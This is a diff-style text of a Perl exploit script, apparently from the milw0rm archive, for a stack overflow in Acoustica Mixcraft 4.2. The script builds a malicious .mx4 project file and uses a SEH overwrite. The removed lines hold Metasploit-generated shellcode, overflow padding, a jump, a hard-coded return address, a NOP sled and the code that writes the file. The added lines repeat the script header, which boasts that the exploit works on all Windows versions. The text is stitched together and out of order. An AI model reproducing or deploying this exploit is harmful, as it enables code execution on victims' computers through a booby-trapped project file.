"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00"; -my $mx4_data2 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x01\x00\x00\x00\x46\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5F\x73\x79\x6E\x74\x68\x2E\x70\x6E\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF". - "\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4C\x49\x53\x54\xDC\x00\x00\x00\x45\x69". - "\x73\x4C\x45\x66\x78\x44\xD0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x4D\x47\x63\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x01\x00\x00\x00\x44\x58\x46\x58\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7F\x00\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00". 
- "\x00\x00\x45\x69\x66\x78";
-
-# win32_exec - EXITFUNC=thread CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x53".
-"\x9f\x26\xea\x83\xeb\xfc\xe2\xf4\xaf\x77\x62\xea\x53\x9f\xad\xaf".
-"\x6f\x14\x5a\xef\x2b\x9e\xc9\x61\x1c\x87\xad\xb5\x73\x9e\xcd\xa3".
-"\xd8\xab\xad\xeb\xbd\xae\xe6\x73\xff\x1b\xe6\x9e\x54\x5e\xec\xe7".
-"\x52\x5d\xcd\x1e\x68\xcb\x02\xee\x26\x7a\xad\xb5\x77\x9e\xcd\x8c".
-"\xd8\x93\x6d\x61\x0c\x83\x27\x01\xd8\x83\xad\xeb\xb8\x16\x7a\xce".
-"\x57\x5c\x17\x2a\x37\x14\x66\xda\xd6\x5f\x5e\xe6\xd8\xdf\x2a\x61".
-"\x23\x83\x8b\x61\x3b\x97\xcd\xe3\xd8\x1f\x96\xea\x53\x9f\xad\x82".
-"\x6f\xc0\x17\x1c\x33\xc9\xaf\x12\xd0\x5f\x5d\xba\x3b\x70\xe8\x0a".
-"\x33\xf7\xbe\x14\xd9\x91\x71\x15\xb4\xfc\x47\x86\x30\x9f\x26\xea";
-
-my $overflow1 = "\x41" x 316;
-my $overflow2 = "\x41" x 1024;
-my $short_jmp = "\xeb\x06\xff\xff";
-my $ret = "\xf9\x2b\x03\x10"; #universal return address = 0x10032bf9 acuutils.dll
-my $nop_sled = "\x90" x 24;
-
-open(my $mx4_file, "> s.mx4");
-binmode $mx4_file;
-print $mx4_file $mx4_data1.
- $overflow1.$short_jmp.$ret.$nop_sled.$shellcode.$overflow2.
- $mx4_data2;
-close($mx4_file);
-
-# milw0rm.com [2008-12-24]
+#!/usr/bin/perl
+#
+# Acoustica Mixcraft <= 4.2 Universal Stack Overflow Exploit (SEH)
+# ------------------------------------------------------
+# Found/Exploit by SkD (skdrat@hotmail.com)
+#
+# MixCraft Download = http://www.acoustica.com/mixcraft/download.htm
+#
+# A local exploit for the .mx4 project file affecting MixCraft 4.2 (other versions
+# may also work). I knew of this vulnerability since MixCraft 3, so
+# it's time to release a fresh exploit to the public for the latest ver of this
+# software.
+# This exploit also implements the SEH technique to exploit the issue and it
+# works on all Windows versions.
+#
+# Enjoy.
+#
+# Note: Author has no resposibility over the damage you do with this!
+ +use strict; +use warnings; +my $mx4_data1 = "\x52\x49\x46\x46\xBC\x14\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x01".("\x00" x 2320). + "\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x01\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00". + "\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x54\x72\x6B\x4D\xA0\x07\x00\x00\x9A\x99\x99\x99\x99\x99\xF1\x3F\x00\x00". + "\x00\x00\x49\x6E\x73\x74\x72\x75\x6D\x65\x6E\x74\x20\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00"; +my $mx4_data2 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x01\x00\x00\x00\x46\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5F\x73\x79\x6E\x74\x68\x2E\x70\x6E\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
